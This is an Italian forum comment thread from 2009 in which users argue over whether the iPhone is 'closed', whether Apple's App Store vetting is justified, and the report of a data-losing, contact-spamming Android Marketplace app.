        Ma infatti io non capisco come tanta gente si accanisca contro un prodotto dicendo "è chiuso".Boh, chiuso de che?Io ho "aperto" la scatola e ho trovato l'iPhone facile da usare, così come è stato facile trovare programmi che mi andavano bene, oltretutto gratuiti.Che si vuole di più?Le limitazioni di licenza che Apple impone ai programmatori sono una cosa, la chiusura sinceramente non so cos'è.Nonostante ciò, i programmatori riescono a fare software a dir poco incredibili e inpensabili su altre piattaforme, e Apple mette a disposizione un sistema di distribuzione semplice e facilmente raggiungibile.Se tutto questo è criticabile, allora a queste persone piace andare a cercare programmi chissà dove e come, con grande perdita di tempo, per poi imparare a come si installano, non avere nessun tipo di assistenza e correre i rischi che il software sconosciuto offre.Valli a capire.
      • Numeri scrive:
        Re: Allora l'iPhone è chiuso...
        - Scritto da: FinalCut
        Mi dispiace per Google, ma mi farebbe taaanto
        piacere che qualche piccola epidemia di virus
        evidenziasse i pericoli di una architettura
        completamente open su un
        cellulare.
        Che bel pensiero! Tipico da te.... e poi ti metti il pinguino come logo.Sei proprio falso.Ciao
        • FinalCut scrive:
          Re: Allora l'iPhone è chiuso...
          - Scritto da: Numeri
          Che bel pensiero! Tipico da te.... e poi ti metti
          il pinguino come
          logo.

          Sei proprio falso.Eh no mi dispiace ma telefono ≠ PCancora di piùtelefono ≠ serverSul telefono ci sono dati sensibilissimi e di solito non c'è un "amministratore" esperto a gestire il tuo telefonino...non si possono portare paragoni tra mele e banane.(linux)(apple)
    • yarn scrive:
      Re: Allora l'iPhone è chiuso...
      - Scritto da: alexjenn
      e questa parte dell'articolo l'avevo più volte
      profetizzato, er esempio qui, poco
      fa:

      http://punto-informatico.it/b.aspx?i=2535126&m=253

      "Sebbene la scelta di Apple non si sia rivelata
      troppo popolare tra gli addetti ai lavori, forse
      a Mountain View oggi c'è qualcuno che pensa che
      tutto sommato non gli sarebbe dispiaciuto aver
      fatto qualcosa di simile anche con Android e il
      suo Marketplace. MemoryUp Personal, piccolo
      software che avrebbe dovuto avere il compito di
      liberare memoria RAM per consentire la più rapida
      esecuzione di altri programmi sviluppato da
      eMobiStudio, si è rivelato una piccola serpe in
      seno: decine di utenti hanno lamentato perdite di
      dati connesse all'utilizzo di questa
      applicazione, accusata anche di fare spam con la
      lista contatti presente nel
      cell."

      Capito perché Apple ritiene necessario avallare i
      programmi che possono essere distribuiti da App
      Store?Tu non ha profetizzato un bel nulla dato che in quel thread del link si parlava di limitazioni varie dell'iPhone e di limitazioni su certi tipi di programmi che possono essere messi in vendita su Apple Store.Proibire programmi che contengono codice malevolo NON significa dover vietare anche programmi come navigatori, copia-incolla, bluetooth per ascoltare musica tramite A2DP, mms, uso come modem per il portatile, programmi che hanno stesse funzioni di quelli già di serie (niente alternative a mail, safari etc.), flash, java etc. etc.E adesso di vanti anche di aver "profetizzato" la notizia di oggi come se le limitazioni sui navigatori etc. servissero a "proteggere" l'utente. E certo... è risaputo che i navigatori e l'uso come modem per il portatile sono sempre portatori di spam... Vero?Ma va a ciapar i ratt...E continua a credere ad Apple secondo cui una batteria sostituibile avrebbe aumentato lo spessore di 6 mm!!! E' incredibile come prendiate per oro colato tutto ciò che dice Apple.Addio. Tanto vedo che ragionare con un mac-religioso è inutile.
      • ruppolo scrive:
        Re: Allora l'iPhone è chiuso...
        - Scritto da: yarn
        Proibire programmi che contengono codice malevolo
        NON significa dover vietare anche programmi come
        navigatori, copia-incolla, bluetooth per
        ascoltare musica tramite A2DP, mms, uso come
        modem per il portatile, programmi che hanno
        stesse funzioni di quelli già di serie (niente
        alternative a mail, safari etc.), flash, java
        etc.
        etc.Infatti nulla di quello che hai elencato è proibito. Semplicemente è irrealizzabile con l'SDK fornito. E va benissimo così.

        E adesso di vanti anche di aver "profetizzato" la
        notizia di oggi come se le limitazioni sui
        navigatori etc. servissero a "proteggere"
        l'utente. E certo... è risaputo che i navigatori
        e l'uso come modem per il portatile sono sempre
        portatori di spam...
        Vero?Quale sarebbe il problema del modem? Basta che prendi una chiavetta 3g e hai risolto il problema. Le regalano pure, e con piano dati adeguato a un laptop.
        Ma va a ciapar i ratt...Si rosica, eh?
        E continua a credere ad Apple secondo cui una
        batteria sostituibile avrebbe aumentato lo
        spessore di 6 mm!!! E' incredibile come prendiate
        per oro colato tutto ciò che dice
        Apple.Kaspita, quindi Apple in realtà è interessata al business delle batterie? Eppure a me non risulta che abbia acquistato aziende produttrici di batterie... a te si?
        Addio. Tanto vedo che ragionare con un
        mac-religioso è
        inutile.Ragionare? Io non vedo traccia di ragionamenti, nel tuo post. Evidentemente non sei capace.
      • alexjenn scrive:
        Re: Allora l'iPhone è chiuso...
        Le batterie sostituibili occupano più spazio perché dentro un involucro, perché necessitano di sistemi di fissaggio, perché l'alloggiamento dev'essere fatto in modo diverso e perché la chiusura del coperchio crea spessore.E questo non lo dice Apple, bensì è un tipico problema di progettazione industriale. Poi, Yarn, rileggiti la risposta che mi avevi dato il quel post a proposito dei rischi su programmi non certificati.Il tuo "ragionamento" è stato completamente smentito da questa notizia, mentre il mio ragionamento è stato confermato.Eppure tu dici di ragionare in modo obiettivo...Quando dico che Apple avalla il programmi che verranno distribuiti dal suo App Store, non dico (e non ho mai detto) che Apple lo faccia per proteggere gli utenti, bensì se stessa.Se Apple (azienda cui va contro tanta gente, una sei tu) comincia a distribuire software per l'iPhone (attualmente il telefono più famoso al mondo) che possono creare problemi come quello per Android, pensi che gente come te non gli farebbero subito causa chiedendo milioni di dollari in danni?Quindi Apple si cautela, certifica i programmi che possono essere distribuiti o meno, e, in secondo lato, va bene anche all'utente finale.Se questo mio ragionamento lo chiami "religioso", dimmelo così non perdo più tempo con chi non è in grado di capire altro.-----------------------------------------------------------Modificato dall' autore il 29 gennaio 2009 12.02-----------------------------------------------------------
    • pabloski scrive:
      Re: Allora l'iPhone è chiuso...
      è scontato che il primo passo per evitare schifezze è quello di controllare il software che verrà installato.....in questo senso linux vince su tutta la linea grazie al sistema dei repositoryun sistema operativo può essere sicuro, non esporre vulnerabilità sfruttabili da remoto, non avere stupidaggini come l'autorun di windows, ma c'è poco da fare contro un utonto idiota che scarica un software crakkato e trojanato e installa il malware con le sue manil'unica soluzione sarebbero gli antivirus proattivi, ma chissà se e quando saranno realtà utilizzabili e non giocattoli che producono montagne di falsi positivi
      • alexjenn scrive:
        Re: Allora l'iPhone è chiuso...
        - Scritto da: pabloski
        è scontato che il primo passo per evitare
        schifezze è quello di controllare il software che
        verrà
        installato.....

        in questo senso linux vince su tutta la linea
        grazie al sistema dei
        repository

        un sistema operativo può essere sicuro, non
        esporre vulnerabilità sfruttabili da remoto, non
        avere stupidaggini come l'autorun di windows, ma
        c'è poco da fare contro un utonto idiota che
        scarica un software crakkato e trojanato e
        installa il malware con le sue
        mani
        Hai colto il punto.
        l'unica soluzione sarebbero gli antivirus
        proattivi, ma chissà se e quando saranno realtà
        utilizzabili e non giocattoli che producono
        montagne di falsi
        positivi
        • pabloski scrive:
          Re: Allora l'iPhone è chiuso...
          rimane da scoprire il perchè i capoccioni dell'IT security non avanzino tali proposte.....ma forse ci marciano....ops, a pensar male ci si azzecca sempre :D
    • -ToM- scrive:
      Re: Allora l'iPhone è chiuso...
      - Scritto da: alexjenn
      Capito perché Apple ritiene necessario avallare i
      programmi che possono essere distribuiti da App
      Store?perchè sono i primi ad essere consapevoli che il marchio UNIX sopra la scatola serve solo a passare al 10% del mercato.
      • Ahi ahi scrive:
        Re: Allora l'iPhone è chiuso...
        - Scritto da: -ToM-
        - Scritto da: alexjenn

        Capito perché Apple ritiene necessario avallare
        i

        programmi che possono essere distribuiti da App

        Store?

        perchè sono i primi ad essere consapevoli che il
        marchio UNIX sopra la scatola serve solo a
        passare al 10% del
        mercato."serve solo" o "serve da solo" ?
        • -ToM- scrive:
          Re: Allora l'iPhone è chiuso...
          è ugualos.ma se vuoi sapere la verità va bene "serve solo".
          • AhiAhi scrive:
            Re: Allora l'iPhone è chiuso...
            - Scritto da: -ToM-
            è ugualos.forse per te...
            ma se vuoi sapere la verità va bene "serve solo".la tua o quella di tutti?
          • -ToM- scrive:
            Re: Allora l'iPhone è chiuso...
            - Scritto da: AhiAhi

            ma se vuoi sapere la verità va bene "serve
            solo".

            la tua o quella di tutti?no, quella del TOG che ha fatto causa ad Apple ed ha ovviamente vinto perchè Apple ha messo in giro un Sistema Operativo marchiato UNIX (stampato sulla scatola) senza avere pagato la gabella di 200.000 dollari al TOG e senza aver passato neanche mezzo dei 50 test che si deve fare per essere certificati UNIX perchè ha evitato i test a piè pari.PLONK
          • AhiAhi scrive:
            Re: Allora l'iPhone è chiuso...
            bla bla bla ma rimanendo ai giorni nostri?PLONK
          • -ToM- scrive:
            Re: Allora l'iPhone è chiuso...
            è roba di pochi anni fa, mica si parla degli anni 80.come al solito si parla nel senso che ci torna più comodo."ahi ahi" è il male che senti quando ti rode?
Chiudi i commenti